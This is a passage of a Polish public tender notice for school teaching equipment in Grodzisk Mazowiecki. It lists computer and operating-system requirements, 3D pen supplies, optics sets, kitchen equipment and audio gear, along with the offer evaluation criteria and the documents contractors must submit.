poziomu szybkiego menu boot lub BIOS, umożliwiający przetestowanie komputera a w szczególności jego składowych. <br/>System musi wyświetlać kod QR przedstawiający opis incydentu. Działający w pełni, bez okrojonych funkcjonalności nawet w przypadku uszkodzonego dysku, braku dysku lub sformatowanym dysku.<br/>Bezpieczeństwo - Zintegrowany z płytą główną dedykowany układ sprzętowy służący do tworzenia i zarządzania wygenerowanymi przez komputer kluczami szyfrowania. Zabezpieczenie to musi posiadać możliwość szyfrowania poufnych dokumentów przechowywanych na dysku twardym przy użyciu klucza sprzętowego. <br/>Weryfikacja wygenerowanych przez komputer kluczy szyfrowania musi odbywać się w dedykowanym chipsecie na płycie głównej.<br/>Złącze linki zabezpieczającej<br/>System operacyjny - Zainstalowany system operacyjny w wersji edukacyjnej musi spełniać następujące wymagania, poprzez wbudowane mechanizmy, bez użycia dodatkowych aplikacji:<br/>- możliwość dokonywania aktualizacji i poprawek systemu przez Internet z możliwością wyboru instalowanych poprawek;<br/>- Możliwość dokonywania uaktualnień sterowników urządzeń przez Internet – witrynę producenta systemu<br/>- Darmowe aktualizacje w ramach wersji systemu operacyjnego przez Internet (niezbędne aktualizacje, poprawki, biuletyny bezpieczeństwa muszą być dostarczane bez dodatkowych opłat) – wymagane podanie nazwy strony serwera WWW;<br/>- Internetowa aktualizacja zapewniona w języku polskim;<br/>- Wbudowana zapora internetowa (firewall) dla ochrony połączeń internetowych; zintegrowana z systemem konsola do zarządzania ustawieniami zapory i regułami IP v4 i v6;<br/>- Zlokalizowane w języku polskim, co najmniej następujące elementy: menu, odtwarzacz multimediów, pomoc, komunikaty systemowe;<br/>- Wsparcie dla większości powszechnie używanych urządzeń peryferyjnych (drukarek, urządzeń sieciowych, standardów USB, Plug &amp;Play, Wi-Fi)<br/>- Funkcjonalność automatycznej zmiany domyślnej drukarki w zależności od sieci, do której podłączony jest komputer;<br/>- Interfejs użytkownika działający w trybie graficznym z elementami 3D, zintegrowana z interfejsem użytkownika interaktywna część pulpitu służącą do uruchamiania aplikacji, które użytkownik może dowolnie wymieniać i pobrać ze strony producenta.<br/>- Możliwość zdalnej automatycznej instalacji, konfiguracji, administrowania oraz aktualizowania systemu;<br/>- Zabezpieczony hasłem hierarchiczny dostęp do systemu, konta i profile użytkowników zarządzane zdalnie; praca systemu w trybie ochrony kont użytkowników.<br/>- Zintegrowany z systemem moduł wyszukiwania informacji (plików różnego typu) dostępny z kilku poziomów: poziom menu, poziom otwartego okna systemu operacyjnego; system wyszukiwania oparty na konfigurowalnym przez użytkownika module indeksacji zasobów lokalnych.<br/>- Zintegrowane z systemem operacyjnym narzędzia zwalczające złośliwe oprogramowanie; aktualizacje dostępne u producenta nieodpłatnie bez ograniczeń czasowych.<br/>- Funkcjonalność rozpoznawania mowy, pozwalającą na sterowanie komputerem głosowo, wraz z modułem „uczenia się” głosu użytkownika.<br/>- Zintegrowany z systemem operacyjnym moduł synchronizacji komputera z urządzeniami zewnętrznymi.<br/>- Wbudowany system pomocy w języku polskim;<br/>- Możliwość przystosowania stanowiska dla osób niepełnosprawnych (np. słabo widzących);<br/>- Możliwość zarządzania stacją roboczą poprzez polityki – przez politykę rozumiemy zestaw reguł definiujących lub<br/>ograniczających funkcjonalność systemu lub aplikacji;<br/>- Wdrażanie IPSEC oparte na politykach – wdrażanie IPSEC oparte na zestawach reguł definiujących ustawienia zarządzanych w sposób centralny;<br/>- Automatyczne występowanie i używanie (wystawianie) certyfikatów PKI X.509;<br/>- Rozbudowane polityki bezpieczeństwa – polityki dla systemu operacyjnego i dla wskazanych aplikacji;<br/>- System posiada narzędzia służące do administracji, do wykonywania kopii zapasowych polityk i ich odtwarzania oraz generowania raportów z ustawień polityk;<br/>- Wsparcie dla Sun Java i .NET Framework 1.1 i 2.0 i 3.0 – możliwość uruchomienia aplikacji działających we wskazanych środowiskach;<br/>Szczegółowy OPZ w rozdziale IV do SWZ i zał. 1b <br/><br/>7. 7. Mikroskop wraz z akcesoriami<br/>Ilość: 2 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami wskazanymi<br/>w SWZ oraz sposobem oceny ofert w ramach tych kryteriów opisanym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oferta częściowa nr 3 - Szkoła Podstawowa nr 4 w Grodzisku Mazowieckim<br/><br/>Filament do długopisów 3D<br/>Ilość: 9<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Filament kompatybilny z PENem 3D 3Doodler <br/>Create+, model 3DRPLUS – zapasowe wkłady do długopisu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39300000-5 - Różny sprzęt</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami wskazanymi<br/>w SWZ oraz sposobem oceny ofert w ramach tych kryteriów opisanym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oferta częściowa nr 4 - Szkoła Podstawowa nr 5 w Grodzisku Mazowieckim<br/><br/>1.	Szafa metalowa<br/>Ilość: 1 szt.<br/><br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Rodzaj - Szafa metalowa na narzędzia z półkami<br/><br/>Szafa wyposażona w 4 półki przestawne co 35 mm oraz dwuskrzydłowe drzwi z chowanymi zawiasami. Drzwi są zamykane na zamek baskwilowy. Szafę można poziomować dzięki zastosowanym regulatorom. Cała konstrukcja została wykonana z blachy stalowej.<br/><br/>Wymiary - 100 x 43,5 x 195 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39300000-5 - Różny sprzęt</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami wskazanymi<br/>w SWZ oraz sposobem oceny ofert w ramach tych kryteriów opisanym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oferta częściowa nr 5 - Szkoła Podstawowa nr 6 w Grodzisku Mazowieckim<br/><br/>1.	Ława optyczna <br/><br/>Ilość: 5 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>1. Ława optyczna 150 cm z akcesoriami :<br/>Zestaw: Rozbudowany zestaw do doświadczeń z zakresu optyki geometrycznej, który doskonale sprawdza się zarówno przy demonstracji, jak i w przypadku ćwiczeń uczniowskich. Oprócz trwałej ławy wykonanej z aluminium, zawiera również zestaw soczewek w oprawie, dwustronny ekran, oświetlacz.<br/>Skład i opis elementów: <br/>1.	źródło światła (220V) <br/>2.	soczewki o śr.50 mm i ogniskowych f: +50, +100, +150, +200 i -150 mm – 5 szt.,<br/>3.	przedmiot optyczny<br/>4.	ekran dwustronny o wymiarach 8x11cm, z naniesioną skalą w pionie i poziomie z jednej strony oraz w całości biały z drugiej strony<br/>5.	suwaki do mocowania akcesoriów optycznych zestawu - 6szt.,<br/>6.	szyna aluminiowa (ława) o przekroju 5 x 3 x 120cm<br/>7.	nóżki do ławy – 2 szt.<br/><br/>2.	Waga szkolna elektroniczna<br/>Ilość: 5 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Waga szkolna elektroniczna; <br/>Wyświetlacz cyfrowy<br/> Zasilanie: bateryjne<br/> Maksymalne obciążenie 2000g<br/> Dokładność 1g,<br/>3.	Zestaw soczewek<br/>Ilość: 5 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Zestaw soczewek – soczewki dwuwypukłe i dwuwklęsłe:<br/><br/>Zestaw zawiera dwie soczewki o średnicy 10 cm każda. Każda soczewka umieszczona jest na osobnej okrągłej podstawie. Jedna soczewka jest dwuwypukłe druga dwuwklęsła. <br/><br/>Zestaw soczewek idealnie nadaje się do doświadczeń z optyki. <br/><br/>4.	Zestaw zwierciadeł<br/>Ilość: 5 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Zestaw zwierciadeł:<br/><br/>Zestaw zawiera dwa zwierciadła kuliste o średnicy 10cm każde. Każde zwierciadło umieszczone na osobnej okrągłej podstawie. Jedno zwierciadło jest wypukłe drugie wklęsłe.<br/><br/>5.	Kuchenka nastawna <br/>Ilość: 2 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Kuchenka nastawna - Moc 1,8 Kw Liczba pól grzewczych: 1<br/>Rodzaj płyty - indukcyjna<br/>Szerokość /głębokość - 29,5 / 37<br/><br/>6.	Gofrownica<br/>Ilość: 3 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Gofrownica - Moc [W]: 1000 Liczba gofrów: 4 Kształt gofrów: kwadraty<br/>Obudowa - Stal nierdzewna<br/>funkcje - Nieprzywieralna powłoka płytek<br/><br/><br/>7.	Patelnie do naleśników<br/>Ilość: 2 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Patelnia do naleśników - Patelnia wykonana z aluminium z powłoką Teflon. <br/>Przystosowana do indukcji. Średnica ok. 25 cm<br/><br/>8.	Deski do krojenia<br/><br/>Ilość: 10 szt.<br/>Wymagane minimalne parametry techniczne<br/><br/>Deski do krojenia - Deska kuchenna prostokątna<br/>-plastik<br/>- dwie wielkości : <br/>5 szt dł. 30cm ; szer. Ok 20 cm.<br/>5	szt. Dł. 45 cm. Szer. Ok 30 cm<br/><br/><br/>9 Noże kuchenne<br/>Ilość: 2 komplety<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Noże kuchenne - Typ noża: uniwersalny , szefa kuchni, Santoku, do warzyw, kuchenny<br/>Ostrze / rękojeść: stal nierdzewna / tworzywo sztuczne<br/>Przeznaczenie: do mięsa, do owoców i warzyw, do ryb, uniwersalne, do wędlin<br/>10. Zestaw mikrofonów bezprzewodowych<br/><br/>Ilość: 1 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Zestaw mikrofonów bezprzewodowych;<br/><br/>Kompaktowy, 2 kanałowy,zestaw mikrofonów bezprzewodowych zawierający:<br/>•	Bezprzewodowy odbiornik radiowy<br/>•	Nadajnik bezprzewodowy ręczny 2 szt.<br/>•	Przewód Jack 6.35mm - 6.35mm JACK – JACK<br/>•	Zasilacz sieciowy<br/><br/>Specyfikacja:<br/>•	Kontrola blokady szumów: blokada szumów<br/>•	Odchylenie częstotliwości: ± 18 kHz<br/>•	Pasmo przenoszenia: 80 Hz-15 kHz<br/>•	Stabilność częstotliwości: ± 0,005%<br/>•	Stosunek S / N: &gt; 70db<br/>•	Całkowite zniekształcenie harmoniczne: 90dB<br/>•	Zasięg działania: do 50 m w terenie otwartym;<br/>•	Rezonansowa częstotliwość zakłócania: 50dB;<br/>•	Częstotliwość zakłócania obrazu: 50dB;<br/>•	Zasilacz odbiornika: AC 110-120 V / 220-240 V;<br/>•	Zasilanie nadajnika: Baterie AA 1,5 V 2szt<br/>•	Moc nadawania: &lt; 10 mW;<br/>•	Zakres częstotliwości: 174 MHz-216 MHz;<br/>•	Typ wyjścia: Wyjście oddzielne XLR lub mieszane JACK 6.35mm<br/>11.Pokrowiec na kolumny<br/><br/>Ilość: 1 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Pokrowiec na kolumny SAMSON <br/>Cechy:<br/>•	Zaprojektowany dla głośników Expedition XP312w<br/>•	Wykonany z mocnego materiału<br/>•	Kieszeń na akcesoria do mikrofonów i kabli<br/>•	Otwór do przenoszenia uchwytów<br/><br/> 12. Para statywów kolumnowych<br/> <br/>Ilość: 1 szt. <br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Para statywów kolumnowych:<br/>Model : SP50P<br/>Kolor : Czarny<br/>Typ Statywu : Statyw mikrofonowy<br/>Wariant : Prosty<br/>WAGA (kg) : 4<br/>Wysokość minimalna (cm) : 100<br/><br/><br/>•	Dwa wytrzymałe, teleskopowe stojaki głośnikowe, każdy z podstawą statywu<br/>•	Lekka, aluminiowa konstrukcja<br/>•	Eleganckie czarne wykończenie<br/>•	Regulowany do 5 &#39;wysokości<br/>•	Standardowe adaptery biegunowe 3/8 ”pasują praktycznie do wszystkich głośników PA<br/>•	110 lb (50 kg) pojemności przeładunkowej na stoisko<br/>•	Zatrzaski blokujące dla większego wsparcia<br/> Obejmuje płócienną torbę </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39300000-5 - Różny sprzęt</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami wskazanymi<br/>w SWZ oraz sposobem oceny ofert w ramach tych kryteriów opisanym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oferta częściowa nr 6 - Szkoła Podstawowa w Adamowiźnie <br/>1.	Filamenty zestaw Skriware PLA<br/>Ilość: 4 szt.<br/><br/>Wymagane minimalne parametry techniczne<br/><br/>Filament - Biodegradowalne filamenty kompatybilne z drukarkami Zortrax M200<br/>Rodzaj – PLA<br/>Zawartość zestawu - 4 szt. różnych kolorów<br/>Waga - Min. 900 g każdego koloru </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39300000-5 - Różny sprzęt</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami wskazanymi<br/>w SWZ oraz sposobem oceny ofert w ramach tych kryteriów opisanym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oferta częściowa nr 7 - Szkoła Podstawowa w Książenicach<br/><br/>Pen 3D z akcesoriami<br/>Ilość: 5 szt.<br/>Wymagane minimalne parametry techniczne<br/><br/>Podwójny system napędowy.<br/>Obsługujący: PLA, ABS i FLEXY<br/>Automatyczne cofanie filamentu, aby zapobiec wyciekaniu<br/>Funkcja auto sleep <br/>Średnica dyszy [mm] max. 2.2<br/>Temperatura pracy [st. C] max. 240<br/>Regulacja temperatury: Tak<br/>Regulacja szybkości wydruku: Tak<br/>Zasilanie: Sieciowo-akumulatorowe<br/>Wyposażenie: Filamenty kompatybilne z PENem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający kierował się będzie kryteriami wskazanymi<br/>w SWZ oraz sposobem oceny ofert w ramach tych kryteriów opisanym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007<br/>r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik<br/>nr 3 do SWZ;<br/>2) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>Ogłoszenie nr 2022/BZP 00481065/01 z dnia 2022-12-07<br/>2022-7. Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu obejmują:<br/>Nie dotyczy<br/>8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast:<br/>1) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o<br/>których mowa w ust. 6 pkt 2 - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające, że:<br/>a. nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>9. Dokumenty, o których mowa w ust. 8 powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>10. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.<br/>8- dalej pkt 10 SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym (dla danej części) – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2)	Wypełniona Tabela Kosztowa stanowiący załącznik nr 1a-g do SWZ (dla danej części)<br/>3) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>4) Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy.<br/>5)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy chyba, że umocowanie do reprezentacji wynika z dokumentów, o których mowa w ust. 4 poniżej. <br/>4. Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu oferty wskaże dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy jak również w 